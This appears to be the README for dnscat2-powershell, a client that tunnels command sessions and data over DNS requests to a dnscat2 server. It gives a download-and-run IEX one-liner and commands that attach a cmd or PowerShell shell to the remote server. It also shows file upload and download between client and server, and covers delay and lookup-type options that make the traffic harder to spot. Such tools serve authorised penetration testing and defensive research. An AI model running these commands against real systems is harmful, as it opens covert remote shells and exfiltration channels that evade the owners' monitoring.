dnscat2 is a DNS covert channel tool by @iagox86 (Ron Bowes) which is used to transfer data over DNS requests.
This is a powershell version of the dnscat2 C client.
Click here for a blog post that gives a more detailed breakdown of the purpose of this script, and how to use it.
To use this script, you'll need the ruby dnscat2 server. Make sure to add the --no-cache option when running the server. This client is incompatible with the server's caching.
First, install the dnscat2 server. Start the server with caching disabled using --no-cache. The command to start your server should look something like this: ruby dnscat2.rb --dns="domain=example.com" --no-cache
Next, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')
Start-Dnscat2 is the actual function used as the client. Specifiy the dnscat2 server using -Domain.
Start a command session, and send DNS requests to 8.8.8.8 on port 53:
Start-Dnscat2 -Domain <dnscat2 server> -DNSServer 8.8.8.8
Send a cmd shell, and send DNS requests to the default DNS Server set in Windows:
Start-Dnscat2 -Domain <dnscat2 server> -Exec cmd
Start a console session. Only use CNAME, MX, and AAAA requests:
Start-Dnscat2 -Domain <dnscat2 server> -LookupTypes @("CNAME","MX","AAAA") -Console
Do not encrypt the session. Encryption is enabled by default.
Start-Dnscat2 -Domain <dnscat2 server> -NoEncryption
The client can handle normal dnscat2 commands, or the powershell version of that command. To use the powershell version of a command, set specific parameters the client will detect (These are commands run from a command session on the server):
Start a new session which simulates a Powershell shell, like ExecPS:
exec psh
Upload app.exe on the server into a hex string stored in the $app powershell variable:
upload app.exe hex:$app
Download the byte array stored in the $app powershell variable to app.exe on the server:
download bytes:$app app.exe
-Domain <String> The Domain being used by the dnscat2 server.
-DNSServer <String> The hostname or IP Address to send DNS queries to. (Default: Set by Windows)
-DNSPort <Int32> The port to send DNS queries to. (Default: 53)
-Command Start a command session. (Default)
-Exec <String> Link the I/O of a process with the Dnscat2 session.
-Console Link the I/O of the console with the Dnscat2 session.
-ExecPS Simulate a Powershell session and link the IO with the Dnscat2 session.
WARNING: Exiting will kill the entire dnscat2 client, not just the session.
-PreSharedSecret Set the same secret on the server to authenticate and prevent MITM.
-NoEncryption Do not use encryption.
-LookupTypes <String[]> Set an array of lookup types to randomly switch between.
Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME)
-Delay <Int32> Set a delay between each request, in milliseconds. (Default: 0)
-MaxRandomDelay <Int32> Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)
-MaxPacketSize <Int32> Maximum length of a dnscat2 packet. (Default: 240)
-Name <String> The name of your dnscat2 session. (Default: hostname)
dnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. Watch out for things that exit powershell like "exit" and "break", because the entire dnscat2-powershell client will exit, not just the ExecPS session.
- db9 on stackoverflow's demonstration of BouncyCastle ECDH.
- FrankSpierings's implementation of Salsa20 and Sha3 in Powershell via C#.
- Rebex Labs stripped down version of the BouncyCastle DLL for ECC.